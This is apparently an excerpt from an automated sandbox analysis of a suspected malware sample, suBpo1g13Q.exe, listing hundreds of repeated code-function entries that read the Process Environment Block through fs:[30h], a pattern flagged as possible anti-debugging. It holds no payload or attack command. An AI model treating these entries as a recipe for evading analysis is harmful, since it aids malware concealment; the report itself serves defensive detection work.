Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014B03E9 mov eax, dword ptr fs:[00000030h] 4_2_014B03E9
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014B03E9 mov eax, dword ptr fs:[00000030h] 4_2_014B03E9
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014B03E9 mov eax, dword ptr fs:[00000030h] 4_2_014B03E9
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014B03E9 mov eax, dword ptr fs:[00000030h] 4_2_014B03E9
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014B03E9 mov eax, dword ptr fs:[00000030h] 4_2_014B03E9
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014D63FF mov eax, dword ptr fs:[00000030h] 4_2_014D63FF
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014BE3F0 mov eax, dword ptr fs:[00000030h] 4_2_014BE3F0
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014BE3F0 mov eax, dword ptr fs:[00000030h] 4_2_014BE3F0
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014BE3F0 mov eax, dword ptr fs:[00000030h] 4_2_014BE3F0
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0149E388 mov eax, dword ptr fs:[00000030h] 4_2_0149E388
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0149E388 mov eax, dword ptr fs:[00000030h] 4_2_0149E388
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0149E388 mov eax, dword ptr fs:[00000030h] 4_2_0149E388
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014C438F mov eax, dword ptr fs:[00000030h] 4_2_014C438F
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014C438F mov eax, dword ptr fs:[00000030h] 4_2_014C438F
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01498397 mov eax, dword ptr fs:[00000030h] 4_2_01498397
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01498397 mov eax, dword ptr fs:[00000030h] 4_2_01498397
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01498397 mov eax, dword ptr fs:[00000030h] 4_2_01498397
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0155A250 mov eax, dword ptr fs:[00000030h] 4_2_0155A250
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0155A250 mov eax, dword ptr fs:[00000030h] 4_2_0155A250
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0157625D mov eax, dword ptr fs:[00000030h] 4_2_0157625D
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01528243 mov eax, dword ptr fs:[00000030h] 4_2_01528243
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01528243 mov ecx, dword ptr fs:[00000030h] 4_2_01528243
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014A6259 mov eax, dword ptr fs:[00000030h] 4_2_014A6259
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0149A250 mov eax, dword ptr fs:[00000030h] 4_2_0149A250
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01550274 mov eax, dword ptr fs:[00000030h] 4_2_01550274
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01550274 mov eax, dword ptr fs:[00000030h] 4_2_01550274
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01550274 mov eax, dword ptr fs:[00000030h] 4_2_01550274
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01550274 mov eax, dword ptr fs:[00000030h] 4_2_01550274
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01550274 mov eax, dword ptr fs:[00000030h] 4_2_01550274
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01550274 mov eax, dword ptr fs:[00000030h] 4_2_01550274
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01550274 mov eax, dword ptr fs:[00000030h] 4_2_01550274
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01550274 mov eax, dword ptr fs:[00000030h] 4_2_01550274
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01550274 mov eax, dword ptr fs:[00000030h] 4_2_01550274
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01550274 mov eax, dword ptr fs:[00000030h] 4_2_01550274
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01550274 mov eax, dword ptr fs:[00000030h] 4_2_01550274
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01550274 mov eax, dword ptr fs:[00000030h] 4_2_01550274
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0149826B mov eax, dword ptr fs:[00000030h] 4_2_0149826B
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014A4260 mov eax, dword ptr fs:[00000030h] 4_2_014A4260
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014A4260 mov eax, dword ptr fs:[00000030h] 4_2_014A4260
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014A4260 mov eax, dword ptr fs:[00000030h] 4_2_014A4260
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0149823B mov eax, dword ptr fs:[00000030h] 4_2_0149823B
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_015762D6 mov eax, dword ptr fs:[00000030h] 4_2_015762D6
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014AA2C3 mov eax, dword ptr fs:[00000030h] 4_2_014AA2C3
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014AA2C3 mov eax, dword ptr fs:[00000030h] 4_2_014AA2C3
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014AA2C3 mov eax, dword ptr fs:[00000030h] 4_2_014AA2C3
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014AA2C3 mov eax, dword ptr fs:[00000030h] 4_2_014AA2C3
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014AA2C3 mov eax, dword ptr fs:[00000030h] 4_2_014AA2C3
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014B02E1 mov eax, dword ptr fs:[00000030h] 4_2_014B02E1
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014B02E1 mov eax, dword ptr fs:[00000030h] 4_2_014B02E1
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014B02E1 mov eax, dword ptr fs:[00000030h] 4_2_014B02E1
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014DE284 mov eax, dword ptr fs:[00000030h] 4_2_014DE284
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014DE284 mov eax, dword ptr fs:[00000030h] 4_2_014DE284
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01520283 mov eax, dword ptr fs:[00000030h] 4_2_01520283
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01520283 mov eax, dword ptr fs:[00000030h] 4_2_01520283
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01520283 mov eax, dword ptr fs:[00000030h] 4_2_01520283
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014B02A0 mov eax, dword ptr fs:[00000030h] 4_2_014B02A0
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014B02A0 mov eax, dword ptr fs:[00000030h] 4_2_014B02A0
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_015362A0 mov eax, dword ptr fs:[00000030h] 4_2_015362A0
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_015362A0 mov ecx, dword ptr fs:[00000030h] 4_2_015362A0
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_015362A0 mov eax, dword ptr fs:[00000030h] 4_2_015362A0
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_015362A0 mov eax, dword ptr fs:[00000030h] 4_2_015362A0
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_015362A0 mov eax, dword ptr fs:[00000030h] 4_2_015362A0
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_015362A0 mov eax, dword ptr fs:[00000030h] 4_2_015362A0
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014A8550 mov eax, dword ptr fs:[00000030h] 4_2_014A8550
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014A8550 mov eax, dword ptr fs:[00000030h] 4_2_014A8550
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014D656A mov eax, dword ptr fs:[00000030h] 4_2_014D656A
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014D656A mov eax, dword ptr fs:[00000030h] 4_2_014D656A
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014D656A mov eax, dword ptr fs:[00000030h] 4_2_014D656A
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01536500 mov eax, dword ptr fs:[00000030h] 4_2_01536500
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01574500 mov eax, dword ptr fs:[00000030h] 4_2_01574500
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01574500 mov eax, dword ptr fs:[00000030h] 4_2_01574500
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01574500 mov eax, dword ptr fs:[00000030h] 4_2_01574500
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01574500 mov eax, dword ptr fs:[00000030h] 4_2_01574500
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01574500 mov eax, dword ptr fs:[00000030h] 4_2_01574500
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01574500 mov eax, dword ptr fs:[00000030h] 4_2_01574500
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01574500 mov eax, dword ptr fs:[00000030h] 4_2_01574500
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014CE53E mov eax, dword ptr fs:[00000030h] 4_2_014CE53E
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014CE53E mov eax, dword ptr fs:[00000030h] 4_2_014CE53E
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CE53E mov eax, dword ptr fs:[00000030h]4_2_014CE53E
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CE53E mov eax, dword ptr fs:[00000030h]4_2_014CE53E
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CE53E mov eax, dword ptr fs:[00000030h]4_2_014CE53E
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0535 mov eax, dword ptr fs:[00000030h]4_2_014B0535
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0535 mov eax, dword ptr fs:[00000030h]4_2_014B0535
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0535 mov eax, dword ptr fs:[00000030h]4_2_014B0535
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0535 mov eax, dword ptr fs:[00000030h]4_2_014B0535
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0535 mov eax, dword ptr fs:[00000030h]4_2_014B0535
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0535 mov eax, dword ptr fs:[00000030h]4_2_014B0535
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DE5CF mov eax, dword ptr fs:[00000030h]4_2_014DE5CF
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DE5CF mov eax, dword ptr fs:[00000030h]4_2_014DE5CF
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A65D0 mov eax, dword ptr fs:[00000030h]4_2_014A65D0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DA5D0 mov eax, dword ptr fs:[00000030h]4_2_014DA5D0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DA5D0 mov eax, dword ptr fs:[00000030h]4_2_014DA5D0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DC5ED mov eax, dword ptr fs:[00000030h]4_2_014DC5ED
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DC5ED mov eax, dword ptr fs:[00000030h]4_2_014DC5ED
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A25E0 mov eax, dword ptr fs:[00000030h]4_2_014A25E0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CE5E7 mov eax, dword ptr fs:[00000030h]4_2_014CE5E7
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CE5E7 mov eax, dword ptr fs:[00000030h]4_2_014CE5E7
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CE5E7 mov eax, dword ptr fs:[00000030h]4_2_014CE5E7
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CE5E7 mov eax, dword ptr fs:[00000030h]4_2_014CE5E7
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CE5E7 mov eax, dword ptr fs:[00000030h]4_2_014CE5E7
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CE5E7 mov eax, dword ptr fs:[00000030h]4_2_014CE5E7
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CE5E7 mov eax, dword ptr fs:[00000030h]4_2_014CE5E7
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CE5E7 mov eax, dword ptr fs:[00000030h]4_2_014CE5E7
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D4588 mov eax, dword ptr fs:[00000030h]4_2_014D4588
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A2582 mov eax, dword ptr fs:[00000030h]4_2_014A2582
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A2582 mov ecx, dword ptr fs:[00000030h]4_2_014A2582
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DE59C mov eax, dword ptr fs:[00000030h]4_2_014DE59C
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015205A7 mov eax, dword ptr fs:[00000030h]4_2_015205A7
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015205A7 mov eax, dword ptr fs:[00000030h]4_2_015205A7
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015205A7 mov eax, dword ptr fs:[00000030h]4_2_015205A7
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C45B1 mov eax, dword ptr fs:[00000030h]4_2_014C45B1
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C45B1 mov eax, dword ptr fs:[00000030h]4_2_014C45B1
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0155A456 mov eax, dword ptr fs:[00000030h]4_2_0155A456
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DE443 mov eax, dword ptr fs:[00000030h]4_2_014DE443
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DE443 mov eax, dword ptr fs:[00000030h]4_2_014DE443
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DE443 mov eax, dword ptr fs:[00000030h]4_2_014DE443
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DE443 mov eax, dword ptr fs:[00000030h]4_2_014DE443
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DE443 mov eax, dword ptr fs:[00000030h]4_2_014DE443
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DE443 mov eax, dword ptr fs:[00000030h]4_2_014DE443
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DE443 mov eax, dword ptr fs:[00000030h]4_2_014DE443
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DE443 mov eax, dword ptr fs:[00000030h]4_2_014DE443
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0149645D mov eax, dword ptr fs:[00000030h]4_2_0149645D
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C245A mov eax, dword ptr fs:[00000030h]4_2_014C245A
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0152C460 mov ecx, dword ptr fs:[00000030h]4_2_0152C460
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CA470 mov eax, dword ptr fs:[00000030h]4_2_014CA470
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CA470 mov eax, dword ptr fs:[00000030h]4_2_014CA470
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CA470 mov eax, dword ptr fs:[00000030h]4_2_014CA470
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D8402 mov eax, dword ptr fs:[00000030h]4_2_014D8402
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D8402 mov eax, dword ptr fs:[00000030h]4_2_014D8402
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D8402 mov eax, dword ptr fs:[00000030h]4_2_014D8402
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0149E420 mov eax, dword ptr fs:[00000030h]4_2_0149E420
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0149E420 mov eax, dword ptr fs:[00000030h]4_2_0149E420
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0149E420 mov eax, dword ptr fs:[00000030h]4_2_0149E420
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0149C427 mov eax, dword ptr fs:[00000030h]4_2_0149C427
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01526420 mov eax, dword ptr fs:[00000030h]4_2_01526420
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01526420 mov eax, dword ptr fs:[00000030h]4_2_01526420
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01526420 mov eax, dword ptr fs:[00000030h]4_2_01526420
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01526420 mov eax, dword ptr fs:[00000030h]4_2_01526420
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01526420 mov eax, dword ptr fs:[00000030h]4_2_01526420
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01526420 mov eax, dword ptr fs:[00000030h]4_2_01526420
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01526420 mov eax, dword ptr fs:[00000030h]4_2_01526420
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DA430 mov eax, dword ptr fs:[00000030h]4_2_014DA430
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A04E5 mov ecx, dword ptr fs:[00000030h]4_2_014A04E5
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0155A49A mov eax, dword ptr fs:[00000030h]4_2_0155A49A
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A64AB mov eax, dword ptr fs:[00000030h]4_2_014A64AB
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0152A4B0 mov eax, dword ptr fs:[00000030h]4_2_0152A4B0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D44B0 mov ecx, dword ptr fs:[00000030h]4_2_014D44B0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D674D mov esi, dword ptr fs:[00000030h]4_2_014D674D
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D674D mov eax, dword ptr fs:[00000030h]4_2_014D674D
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D674D mov eax, dword ptr fs:[00000030h]4_2_014D674D
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01524755 mov eax, dword ptr fs:[00000030h]4_2_01524755
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0152E75D mov eax, dword ptr fs:[00000030h]4_2_0152E75D
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A0750 mov eax, dword ptr fs:[00000030h]4_2_014A0750
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E2750 mov eax, dword ptr fs:[00000030h]4_2_014E2750
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E2750 mov eax, dword ptr fs:[00000030h]4_2_014E2750
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A8770 mov eax, dword ptr fs:[00000030h]4_2_014A8770
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0770 mov eax, dword ptr fs:[00000030h]4_2_014B0770
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0770 mov eax, dword ptr fs:[00000030h]4_2_014B0770
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0770 mov eax, dword ptr fs:[00000030h]4_2_014B0770
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0770 mov eax, dword ptr fs:[00000030h]4_2_014B0770
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0770 mov eax, dword ptr fs:[00000030h]4_2_014B0770
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0770 mov eax, dword ptr fs:[00000030h]4_2_014B0770
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0770 mov eax, dword ptr fs:[00000030h]4_2_014B0770
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0770 mov eax, dword ptr fs:[00000030h]4_2_014B0770
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0770 mov eax, dword ptr fs:[00000030h]4_2_014B0770
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0770 mov eax, dword ptr fs:[00000030h]4_2_014B0770
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0770 mov eax, dword ptr fs:[00000030h]4_2_014B0770
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0770 mov eax, dword ptr fs:[00000030h]4_2_014B0770
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DC700 mov eax, dword ptr fs:[00000030h]4_2_014DC700
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A0710 mov eax, dword ptr fs:[00000030h]4_2_014A0710
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D0710 mov eax, dword ptr fs:[00000030h]4_2_014D0710
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0151C730 mov eax, dword ptr fs:[00000030h]4_2_0151C730
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DC720 mov eax, dword ptr fs:[00000030h]4_2_014DC720
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DC720 mov eax, dword ptr fs:[00000030h]4_2_014DC720
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D273C mov eax, dword ptr fs:[00000030h]4_2_014D273C
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D273C mov ecx, dword ptr fs:[00000030h]4_2_014D273C
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D273C mov eax, dword ptr fs:[00000030h]4_2_014D273C
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014AC7C0 mov eax, dword ptr fs:[00000030h]4_2_014AC7C0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015207C3 mov eax, dword ptr fs:[00000030h]4_2_015207C3
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C27ED mov eax, dword ptr fs:[00000030h]4_2_014C27ED
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C27ED mov eax, dword ptr fs:[00000030h]4_2_014C27ED
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C27ED mov eax, dword ptr fs:[00000030h]4_2_014C27ED
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A47FB mov eax, dword ptr fs:[00000030h]4_2_014A47FB
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A47FB mov eax, dword ptr fs:[00000030h]4_2_014A47FB
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0152E7E1 mov eax, dword ptr fs:[00000030h]4_2_0152E7E1
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0154678E mov eax, dword ptr fs:[00000030h]4_2_0154678E
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A07AF mov eax, dword ptr fs:[00000030h]4_2_014A07AF
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015547A0 mov eax, dword ptr fs:[00000030h]4_2_015547A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014BC640 mov eax, dword ptr fs:[00000030h]4_2_014BC640
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DA660 mov eax, dword ptr fs:[00000030h]4_2_014DA660
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DA660 mov eax, dword ptr fs:[00000030h]4_2_014DA660
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0156866E mov eax, dword ptr fs:[00000030h]4_2_0156866E
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0156866E mov eax, dword ptr fs:[00000030h]4_2_0156866E
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D2674 mov eax, dword ptr fs:[00000030h]4_2_014D2674
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B260B mov eax, dword ptr fs:[00000030h]4_2_014B260B
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B260B mov eax, dword ptr fs:[00000030h]4_2_014B260B
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B260B mov eax, dword ptr fs:[00000030h]4_2_014B260B
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B260B mov eax, dword ptr fs:[00000030h]4_2_014B260B
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B260B mov eax, dword ptr fs:[00000030h]4_2_014B260B
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B260B mov eax, dword ptr fs:[00000030h]4_2_014B260B
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B260B mov eax, dword ptr fs:[00000030h]4_2_014B260B
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E2619 mov eax, dword ptr fs:[00000030h]4_2_014E2619
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0151E609 mov eax, dword ptr fs:[00000030h]4_2_0151E609
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A262C mov eax, dword ptr fs:[00000030h]4_2_014A262C
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014BE627 mov eax, dword ptr fs:[00000030h]4_2_014BE627
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D6620 mov eax, dword ptr fs:[00000030h]4_2_014D6620
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D8620 mov eax, dword ptr fs:[00000030h]4_2_014D8620
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DA6C7 mov ebx, dword ptr fs:[00000030h]4_2_014DA6C7
